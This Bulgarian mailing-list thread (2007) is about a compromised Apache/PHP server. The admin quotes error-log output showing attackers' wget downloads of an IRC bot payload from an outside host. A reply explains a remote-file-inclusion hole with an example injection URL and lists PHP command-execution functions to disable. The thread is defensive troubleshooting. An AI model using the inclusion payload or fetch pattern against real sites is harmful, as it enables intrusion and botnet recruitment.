safe_mode не е добър вариант за решение, имам доста виртуални хостове на
сайтове, никой от тях не използва perl/cgi а само пхп
за всеки сайта съм сетнал open_base dir и не могат да отварят нищо освен
собсвената си директория.
единственно session_path не съм сетвал допълнително и е по подразбиране в /tmp
/var/tmp съм я направил като symbolic link към дяла /tmp и там не могат да се
стартират бинарни файлове.
----- Original Message -----
From: Valery Dachev
To: Linux Users Group - Bulgaria
Sent: Thursday, July 12, 2007 11:08 AM
Subject: Re: [Lug-bg] пробив през апаче и пхп :(
Имах подобен проблем с един от сайтовете при мен. Можеш в php.ini да добавиш
примерно:
disable_functions = exec,passthru,system,proc_open,shell_exec
С това ще забраниш изпълнението по-често използваните функции за изпълнение
на команди.
Преди това обаче е добре да разбереш как успяват да накарат PHPто да
изпълнява въпросните функции. В моя случай в бъгавият сайт имаше глупост от
типа на:
include( $path . "/neshtosi.php" );
Променливата $path не винаги се установяваше и хахорите извикваха адрес от
типа на:
http://my.site.com/shitty-script.php?path=http://their.site.com/their-script.txt&;
Ако имаш много сайтове и не можеш да разбереш през кой от тях ти правят
мизерията, погледни кой е потребителят-собственик на изтеглените файлове. Това
би свършило работа, ако PHP работи като CGI и използваш SUExec. Ако е като
модул и имаш късмета да си с Apache 2, пробвай да инсталираш MPM ITK (в Debian
и Ubuntu пакетът е apache2-mpm-itk). Разбереш ли кой е потребителят, ще трябва
да претърсиш файловете им за include, include_once, require и require_once, за
да видиш кои от тях използват динамични несигурни пътища. Нищо чудно това да е
стара версия на софтуер с известни проблеми.
Поздрави,
Валери.
deb4o wrote:
няколко пъти пробиват през уеб сървъра и копират разни неща за пускане на
irc bot
все в /tmp, но там сетнах noexec,nosuid на този дял и не могат да ги
страртират.
но искам да разбера къде е дупката в апачето.
Apache 2.0.53 и php 4.3.9
Така и не мога да разбера от къде влизат. търсих по логовете но само
единственно в error log-a на апачето намирам подобни на тези неща:
--00:43:08-- http://private.whitehat.ro/flood
=> `flood'
Resolving private.whitehat.ro... 72.22.77.22
Connecting to private.whitehat.ro[72.22.77.22]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 208,412 [text/plain]
0K .......... .......... .......... .......... .......... 24% 60.12
KB/s
50K .......... .......... .......... .......... .......... 49% 237.64
KB/s
100K .......... .......... .......... .......... .......... 73% 16.05
KB/s
150K .......... .......... .......... .......... .......... 98% 60.06
KB/s
200K ... 100% 10.13
MB/s
00:43:13 (40.79 KB/s) - `flood' saved [208412/208412]
-------------------
--11:39:45-- http://private.whitehat.ro/n.jpg
=> `n.jpg'
Resolving private.whitehat.ro... 72.22.77.22
Connecting to private.whitehat.ro[72.22.77.22]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 261,375 [image/jpeg]
0K .......... .......... .......... .......... .......... 19% 60.85
KB/s
50K .......... .......... .......... .......... .......... 39% 122.81
KB/s
100K .......... .......... .......... .......... .......... 58% 16.38
KB/s
150K .......... .......... .......... .......... .......... 78% 61.60
KB/s
200K .......... .......... .......... .......... .......... 97% 81.52
KB/s
250K ..... 100% 1.02
MB/s
11:39:52 (44.69 KB/s) - `n.jpg' saved [261375/261375]
_______________________________________________
Lug-bg mailing list
[email protected]
http://linux-bulgaria.org/mailman/listinfo/lug-bg
------------------------------------------------------------------------------
_______________________________________________
Lug-bg mailing list
[email protected]
http://linux-bulgaria.org/mailman/listinfo/lug-bg
_______________________________________________
Lug-bg mailing list
[email protected]
http://linux-bulgaria.org/mailman/listinfo/lug-bg
